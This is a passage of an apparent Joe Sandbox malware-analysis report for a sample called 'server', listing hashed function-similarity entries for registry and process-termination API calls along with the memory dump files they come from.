              • API String ID: 2951059284-0
              • Opcode ID: 91e4eb31a89c1b75bcc405210a46122ae8368026c4c2d686131c646dbbec5866
              • Instruction ID: dfcd6ffd7c2b6f1af0a9fe509b54bcc8f304e050842e8933d8fb3207ecfded81
              • Opcode Fuzzy Hash: 91e4eb31a89c1b75bcc405210a46122ae8368026c4c2d686131c646dbbec5866
              • Instruction Fuzzy Hash: CDD05EE1001114BFE25193D9AC0DEF73E5DCB863B0F484015B108E2000E2646D80C2B0
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Restore
              • String ID:
              • API String ID: 1214912099-0
              • Opcode ID: 68d186d1160bf75172cdb88ec4303d3224d7891b56835b1727ce78219d3155e9
              • Instruction ID: da59b1d4ab7116966325b780d2e4e6705701d3a494b50fc97aba8ceeb5368b85
              • Opcode Fuzzy Hash: 68d186d1160bf75172cdb88ec4303d3224d7891b56835b1727ce78219d3155e9
              • Instruction Fuzzy Hash: A4C08CC0600140BEFF85D3F88C0CFB325ADC3C030AF08406CB001C3014DA508C41D230
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: DeleteValue
              • String ID:
              • API String ID: 1108222502-0
              • Opcode ID: 7e44e94f6d8af6ac593f5dc7a16ab0af0522a976da85c810963405a9efedf936
              • Instruction ID: 90d11b538bb3b77df5af41e83ba7dfc23f75d99217b4d00ad6d86e8895d5e3ac
              • Opcode Fuzzy Hash: 7e44e94f6d8af6ac593f5dc7a16ab0af0522a976da85c810963405a9efedf936
              • Instruction Fuzzy Hash: 1EC048D0A10184BEEF01A3FCAE0DBB72AAC87D474AF048598B056C20A0CA298981E620
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 8f5d772d1e7f5c8ab5a141bc9b337b558ebad1a54969e53b5e217e5d7544f8f6
              • Instruction ID: 5e9eb259f343fdd010f277f729d33fb32415243d4697d3fc25d18674fbf73597
              • Opcode Fuzzy Hash: 8f5d772d1e7f5c8ab5a141bc9b337b558ebad1a54969e53b5e217e5d7544f8f6
              • Instruction Fuzzy Hash: 10C04CD4600150BEEF11D7F85C5CB76155C87C9701F44C4687006C1155DA144841D621
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: ProcessTerminate
              • String ID:
              • API String ID: 560597551-0
              • Opcode ID: ade2a54190a1a76b7c5a945a008d5258fddd240db8b7c7ca7493395b1eb3670f
              • Instruction ID: 6f6a04d8478061d178efcc61b11a92bceb9e038ba83e7c1e530745c76371db95
              • Opcode Fuzzy Hash: ade2a54190a1a76b7c5a945a008d5258fddd240db8b7c7ca7493395b1eb3670f
              • Instruction Fuzzy Hash: 79C04CD0554250AEFF06D3F85C1CB76255D97C8707F5484A87015E2054C6144945E620
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Save
              • String ID:
              • API String ID: 4115961312-0
              • Opcode ID: 88f496d6a6a64387898f65a0beded9ed6880285c65049d58cd27c17f7a4dd608
              • Instruction ID: 7cf519739b9028c2e64195db21246e7dd2bed33bafcf5a80b3416ad5861a24fa
              • Opcode Fuzzy Hash: 88f496d6a6a64387898f65a0beded9ed6880285c65049d58cd27c17f7a4dd608
              • Instruction Fuzzy Hash: 52C04CD0A00140BEFF8193F85D0CBB715DE87D4755F0884947045D1051DA144945D620
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: ObjectSecurity
              • String ID:
              • API String ID: 2240786066-0
              • Opcode ID: c91344c75d2528641b51a6f279a6cb5007ac32305bca5e4757c1de00a8374e6e
              • Instruction ID: 8a473a13ee93989d612d251f783e2e1a2f3d2b221fda2c40e5584674c92d48f0
              • Opcode Fuzzy Hash: c91344c75d2528641b51a6f279a6cb5007ac32305bca5e4757c1de00a8374e6e
              • Instruction Fuzzy Hash: 999002E0810104AEAF04A7E29D0DD37B66CD5C07023405948B005C151095645841C930
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 97e79d6f2c0f8ac96e02ac60f77866f14f128866dd2708f5bc3f87838c27c296
              • Instruction ID: e7b36d7d4e6cd2e43b8839fd67ffa73fd32704627f7ae5e87ca08ab9209c3ee0
              • Opcode Fuzzy Hash: 97e79d6f2c0f8ac96e02ac60f77866f14f128866dd2708f5bc3f87838c27c296
              • Instruction Fuzzy Hash: 269002E0910100AFAD0497E19E0DC77262CD6D07063044548B00586011A6687805C530
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Replace
              • String ID:
              • API String ID: 3273661913-0
              • Opcode ID: cbf3930a31e8766e6119cf48479f2dbc3c1531798ac35ac1b9f3449ef08c9df6
              • Instruction ID: 094b3d82124d5ff00be268e237464db6b3bdad27f3204cae60377b83eb5422e7
              • Opcode Fuzzy Hash: cbf3930a31e8766e6119cf48479f2dbc3c1531798ac35ac1b9f3449ef08c9df6
              • Instruction Fuzzy Hash: 599002E4910100AEAE5497E09D0DC37252CD5C070130486497001C1210E5645801C530
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
